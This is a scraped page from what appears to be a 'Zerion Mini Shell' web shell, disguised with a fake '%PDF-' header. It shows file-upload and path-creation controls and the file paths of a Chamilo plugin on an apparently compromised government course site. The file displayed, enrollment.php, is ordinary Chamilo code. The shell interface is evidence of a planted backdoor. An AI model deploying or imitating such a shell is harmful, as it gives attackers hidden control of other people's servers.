%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/plugin/whispeakauth/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/plugin/whispeakauth/enrollment.php

<?php
/* For licensing terms, see /license.txt */

use Chamilo\PluginBundle\WhispeakAuth\Controller\EnrollmentController;

$cidReset = true;

require_once __DIR__.'/../../main/inc/global.inc.php';

api_block_anonymous_users(true);

$controller = new EnrollmentController();

try {
    $controller->index();
} catch (Exception $exception) {
    api_not_allowed(
        true,
        Display::return_message($exception->getMessage(), 'warning')
    );
}

Zerion Mini Shell 1.0